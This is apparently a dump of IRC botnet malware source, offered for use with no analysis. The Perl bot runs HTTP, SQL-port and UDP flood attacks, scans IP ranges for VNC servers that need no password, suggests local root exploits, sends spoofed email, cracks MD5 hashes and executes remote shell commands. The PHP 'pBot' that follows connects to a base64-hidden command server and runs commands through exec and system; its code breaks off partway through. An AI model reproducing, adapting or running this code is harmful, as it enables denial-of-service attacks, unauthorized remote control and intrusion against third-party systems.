$h{'loginx'} = {
vuln=>['2.4.22']
};
$h{'exp.sh'} = {
vuln=>['2.6.9','2.6.10','2.6.16','2.6.13']
};
$h{'prctl'} = {
vuln=>['2.6.']
};
$h{'kmdx'} = {
vuln=>['2.6.','2.4.']
};
$h{'raptor'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
$h{'raptor2'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
foreach my $key(keys %h){
foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~/.$/);
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Rootable12] Possible Local Root Exploits: ". $key ." ");
}
}
}
}
#Pr0xy Scan
if ($funcarg =~ /^proxys+(.*)/) {
my @User_Agent = &Agent();
my $str = $1;
if ($str =~ m/^(a|anon|anonymous)$/i) { $str = "anonymous";}
elsif ($str =~ m/^(transparent|tp|t)$/i) { $str = "transparent";}
elsif ($str =~ m/^(h|high|e|elite)$/i) { $str = "high anonymity";}
my @type = "$str";
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ProxySearcher12] Search Type: $str");
my @ttt=();
my @ttt1=();
my @ttt2=();
my @ttt3=();
my $sockt = IO::Socket::INET->new(PeerAddr=>"publicproxyservers.com",PeerPort=>"80",Proto=>"tcp") or return;
print $sockt "GET http://www.publicproxyservers.com/page1.html HTTP/1.0rnHost: publicproxyservers.comrnAccept: */*rnUser-Agent: Mozilla/5.0rnrn";
my @rara = <$sockt>;
$page="@rara";
close($sockt);
while ($page =~ m/<td align="left" height=17(.*)</td>/g)
{
push(@ttt,$1);
}
while ($page =~ m/<td>([A-Z].*)</td>/g)
{
push(@ttt1,$1);
}
while ($page =~ m/<td height=17>(.*)</td>/g)
{
push(@ttt2,$1);
}
while ($page =~ m/<td>(anonymous|transparent|high anonymity)</td>/g)
{
push(@ttt3,$1);
}
foreach $proxyyy (0..(@ttt - 1))
{
if ($ttt3[$proxyyy] =~ /@type/)
{
( my $a, my $ipaddr ) = split( />/, $ttt[$x]);
my $prox="".$ipaddr.":".$ttt2[$proxyyy]."";
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->proxy('http', 'http://'.$prox);
my $response = $ua->get("http://www.google.com/search?q=The_PitBull");
if ($response->is_success)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ProxySearcher12]4 ".$ipaddr.":".$ttt2[$proxyyy]." 12-4 $ttt1[$proxyyy] 12-4 $ttt3[$proxyyy] 12- OK!");
}
}
}
done;
}
# A simple mailer, @sendmail <subject> <sender> <recipient> <message>
if ($funcarg =~ /^sendmails+(.*)s+(.*)s+(.*)s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Mailer12] Sending Mail to :2 $3");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtypen";
print SENDMAIL "Subject: $subjectn";
print SENDMAIL "From: $sendern";
print SENDMAIL "To: $recipientnn";
print SENDMAIL "@corponn";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Mailer12] Mail Sended To :2 $recipient");
}
#SQL Fl00dEr
if ($funcarg =~ /^sqlfloods+(.*)s+(d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@SQL-DDOS12] Attacking 4 ".$1." 12 on port 3306 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
print $socket "GET / HTTP/1.1rnAccept: */*rnHost: ".$1."rnConnection: Keep-Alivernrn";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@SQL-DDOS12] Attacking done 4 ".$1.".");
}
#r0xb0t 4.6 VNC ScaNNer by iNs
if ($funcarg =~ /^vncs+(.*)/) {
my $MAX_SOCKET_TIME = 2;
my $MAX_CONNECT_TIME = 3;
#&ftpcheckm($printl);
my @hosts;
my $MAX_PROCESSES=100;
my $host=$1;
#my $victim=$host;
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@VNC12] :::: IP Range:4 $host* ");
$|=1;
foreach (0..255) {
my $pre="$host.$_.";
foreach (1..255) {
push(@hosts,$pre.$_);
}
}
my @pids;
my $npids=0;
for $victim (@hosts){
my $pid;
$pid=fork();
if($pid>0){
$npids++;
if($npids>=$MAX_PROCESSES){
for(1..($MAX_PROCESSES)){
$wait_ret=wait();
if($wait_ret>0){
$npids--;
}
}
}
next;
} elsif(undef $pid) {
# print "fork errorn" if ($DEBUG);
exit(0);
}else{
my($proto,$port);
$0="";
# kill thread on timeout
local $SIG{'ALRM'} = sub { exit(0); };
alarm $MAX_SOCKET_TIME;
my $port=5900;
print "Connecting to $victim:$port..."; #$| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $victim,
PeerPort => $port,
Proto => 'tcp',)) ? print "n"
: die("n");
#negotiate protocol
$sock->read($protocol_version,12);
print $sock $protocol_version;
#print "Using protocol $protocol_version";
# get security types that we'll be ignoring
$sock->read($security_types,1);
$sock->read($hahaha,unpack('C',$security_types));
# choose no authentication
print $sock "x01";
# we should get "0000" back
$sock->read($in,4);
if(unpack('I',$in)) { die("n") };
# client initialize
print $sock "x01";
# if the server starts sending data we are in
$sock->read($in,4);
(unpack('I',$in)) ?
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@VNC12] ::::4 ".$victim." 12is Vulnerable using protocol4 ".$protocol_version)
#print("Vulnerable!n")
: die("n") ;
exit;
}
}
for(1..$npids){
my $wt=wait();
if($wt==-1){
# print "hey $!n" if($DEBUG);
redo;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@VNC12] :::: Finished Scan for 4 $host ");
}
#-#-#-#-#-#-#-#-#
# IRC #
#-#-#-#-#-#-#-#-#
# join a other channel, @join #channel
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket, "JOIN ".$1);
}
# part a other channel, @part #channel
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket, "PART ".$1);
}
# quit irc, @quit <reason>
if ($funcarg =~ /^quit (.*)/) {
sendraw($IRC_cur_socket, "QUIT ".$1);
}
# voice, @voice <who>
if ($funcarg =~ /^voice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +v ".$1);
}
# devoice, @devoice <who>
if ($funcarg =~ /^devoice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -v ".$1);
}
# halfop, @halfop <who>
if ($funcarg =~ /^halfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +h ".$1);
}
# dehalfop, @dehalfop <who>
if ($funcarg =~ /^dehalfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -h ".$1);
}
# op, @op <who>
if ($funcarg =~ /^op (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +o ".$1);
}
# deop, @deop <who>
if ($funcarg =~ /^deop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -o ".$1);
}
# +Q, @owner <who>
if ($funcarg =~ /^owner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +q ".$1);
}
# -Q, @deowner <who>
if ($funcarg =~ /^deowner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -q ".$1);
}
#-#-#-#-#-#-#-#-#
# Flooders IRC #
#-#-#-#-#-#-#-#-#
# msg, @msgflood <who>
if ($funcarg =~ /^msgflood (.+?) (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@MSGFlood12]14 Excecuted on ".$1." ");
}
# dccflood, @dccflood <who>
if ($funcarg =~ /^dccflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :�01DCC CHAT chat 1121485131 1024�01n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@DCCFlood12]14 Excecuted on ".$1." ");
}
# ctcpflood, @ctcpflood <who>
if ($funcarg =~ /^ctcpflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :�01VERSION�01n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :�01PING�01n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@CTCPFlood12]14 Excecuted on ".$1." ");
}
# noticeflood, @noticeflood <who>
if ($funcarg =~ /^noticeflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@NoticeFlood12]14 Excecuted on ".$1." ");
}
# Channel Flood, @channelflood
if ($funcarg =~ /^channelflood/) {
for($i=0; $i<=25; $i+=1){
sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) );
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ChannelFlood12]14 Excecuted ");
}
# Maxi Flood, @maxiflood
if ($funcarg =~ /^maxiflood(.*)/) {
for($i=0; $i<=15; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5 M4Xi-Fl00dn");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :�01VERSION�01n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :�01PING�01n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :PitBull BoT V5 M4Xi-Fl00dn");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@M4Xi-Fl00d12]14 Excecuted on ".$1." ");
}
#-#-#-#-#-#-#-#-#
# DDOS #
#-#-#-#-#-#-#-#-#
#HTTP Flooder
if ($funcarg =~ /^httpfloods+(.*)s+(d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@HTTP-DDOS12] Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1rnAccept: */*rnHost: ".$1."rnConnection: Keep-Alivernrn";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@HTTP-DDOS12] Attacking done 4 ".$1.".");
}
# UDP Flooder
if ($funcarg =~ /^udpfloods+(.*)s+(d+)s+(d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@UDP-DDOS12] Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@UDP-DDOS12] 12Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1.".");
}
exit;
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoins+(.*)/) {
my $chan = $1;
if ($chan =~ /^(d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
}
else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(S+)s+(S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(S+)s+(S+)/);
}
if ($case =~ /^msgs+(S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^floods+(d+)s+(S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcps+(S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpfloods+(d+)s+(S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connects+(S+)s+(S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@SH3LL12]14 $linha");
if ($c == "$max_lines") {
$c=0;
sleep $sleeping;
}
}
exit;
}
}
}
sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
return(@ret);
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1;
$port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :�01$_[1]�01");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j {
&join(@_);
}
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_);
}
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
sub ice(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://ice.breaker.free.fr/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<b><br><br> - (.*?)<br><br><br>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-ice.breaker.free.fr 4@12]4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-ice.breaker.free.fr 4@12]1 Has not Found.");
}}
sub gdata(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<b>(.*?)</b></td>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-gdataonline.com 4@12]4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-gdataonline.com 4@12]1 Has not Found.");
}}
sub redn(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.rednoize.com/?p&s=md5&q=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<(.*)/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-rednoize.com 4@12]4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-rednoize.com 4@12]1 Has not Found.");
}}
sub xpz(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.xpzone.de/?string=".$md5hash."&mode=decrypt";
my $checker = query($query);
if ($checker =~ m/<b>(.*)</b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-xpzone.de 4@12]4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-xpzone.de 4@12]1 Has not Found.");
}}
sub ben(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.benramsey.com/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<string><![CDATA[(.+?)]]></string>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-benramsey.com 4@12]4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-benramsey.com 4@12]1 Has not Found.");
}}
sub alim(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://alimamed.pp.ru/md5/?md5e=&md5d=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<b>(.+?)</b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-alimamed.pp.ru 4@12]4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-alimamed.pp.ru 4@12]1 Has not Found.");
}}
sub cry(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://us.md5.crysm.net/find?md5=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<li>(.+?)</li>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-crysm.net 4@12]4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ MD5-crysm.net 4@12]1 Has not Found.");
}}
sub query($) {
my $url=$_[0];
$url=~s/http:////;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href="?http:////;
$host=~s/([-a-zA-Z0-9.]+)/.*/$1/;
$query=~s/$host//;
if ($query eq "") { $query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0rnHost: $hostrnAccept: */*rnUser-Agent: Mozilla/5.0rnrn";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub fix_url($) {
my $str=$_[0];
if ($str =~ m/^http://(.*)/i || $str =~ m/^https://(.*)/i) {
$set="".$str."";
}
else {
$set="http://".$str."";
}
return $set;
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href="?http:////;
$host =~ s/([-a-zA-Z0-9.]+)/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0rnHost: $hostrnAccept: */*rnUser-Agent: Mozilla/5.0rnrn";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
here fubar’s terrible ddos bot
<?
set_time_limit( 0 );
error_reporting( 0 );
echo "I deed eet!";
class pBot
{
var $using_encode = true;
var $config = array
(
'server' => 'aXJjLnN5czMyLm5ldA==', //Base64 Server
'port' => 1776,
'chan' => 'cmZpIw==', //Base64 Chan
'key' => '', //Base64 Key
'nickform' => 'fub0t[%d]',
'identp' => 'nig',
'modes' => '+i',
'maxrand' => 8,
'cprefix' => '.',
'host' => 't0d@y.is.a.g00d.day.t0.d.ie'
);
var $admins = array
(
'fubar' => '611c59af56268df5534fef5bc3c37b1d'
);
function auth_host( $nick, $password, $host )
{
$admin_count = count( $this->admins );
if( $admin_count > 0 )
{
$mpass = md5( $password );
if( $this->admins[ $nick ] == $mpass )
{
$this->users[ $host ] = true;
}
}
else
{
$this->users[ $host ] = true;
}
}
function is_authed( $host )
{
return isset( $this->users[ $host ] );
}
function remove_auth( $host )
{
unset( $this->users[ $host ] );
}
function ex( $cfe )
{
$res = '';
if (!empty($cfe))
{
if(function_exists('class_exists') && class_exists('Perl'))
{
$perl = new Perl();
$perl->eval( "system('$cfe');" );
}
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('proc_open'))
{
$res = proc_open($cfe);
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
function is_safe( )
{
if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi( "Windows", $this->ex( "net start" ) ) ) )
{
return 0;
}
return 1;
}
function get_chan( )
{
if( $this->using_encode )
{
return '#'.base64_decode( $this->config[ 'chan' ] );
}
else
{
return '#'.$this->config[ 'chan' ];
}
}
function start()
{
if( $this->using_encode )
{
if(!($this->conn = fsockopen(base64_decode($this->config['server']),$this->config['port'],$e,$s,30)))
{
$this->start();
}
}
else
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
{
$this->start();
}
}
$ident = $this->config['prefix'];
$alph = range("0","9");
for( $i=0; $i < $this->config['maxrand']; $i++ )
{
$ident .= $alph[rand(0,9)];
}
if( strlen( $this->config[ 'pass' ] ) > 0 )
{
$this->send( "PASS ".$this->config[ 'pass' ] );
}
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick( );
$this->main( );
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
if( $this->using_encode )
{
$this->join($this->get_chan( ),base64_decode($this->config['key']));
}
else
{
$this->join($this->get_chan( ),$this->config['key']);
}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "ON";
}
else
{
$safemode = "OFF";
}
$uname = php_uname();
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
